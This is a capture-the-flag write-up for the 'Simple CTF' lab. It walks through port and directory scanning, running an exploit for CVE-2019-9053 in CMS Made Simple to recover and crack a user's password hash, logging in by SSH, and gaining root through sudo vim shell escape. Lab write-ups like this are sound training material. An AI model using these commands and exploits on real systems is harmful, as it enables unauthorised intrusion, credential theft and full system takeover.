Simple CTF
Exploiting a vulnerable CMS & PrivEsc using vim.
This room can be found HERE.
Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.239.221
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Unix
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelGobuster
gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.73.245
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.73.245/simple/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================/simple shows a page made with CMS Made Simple version 2.2.8 which is vulnerable to CVE-2019-9053
Running exploit script
$ python exploit.py -u http://$IP/simple --crack -w /usr/share/wordlists/fasttrack.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: xxxxxxLogin using ssh
We found earlier that SSH was open on port 2222
$ ssh mitch@$IP -p 2222
The authenticity of host '[10.10.73.245]:2222 ([10.10.73.245]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.73.245]:2222' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txtWe found the user flag! 🚩
PrivEsc
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vimDoing sudo -l reveals that we can use vim as root. Using GTFOBins as reference we can exploit this:
$ sudo vim -c ':!/bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)We can now retreive the flag:
# cd /root
# ls
root.txtAnd that's all the flags found! 🚩
Last updated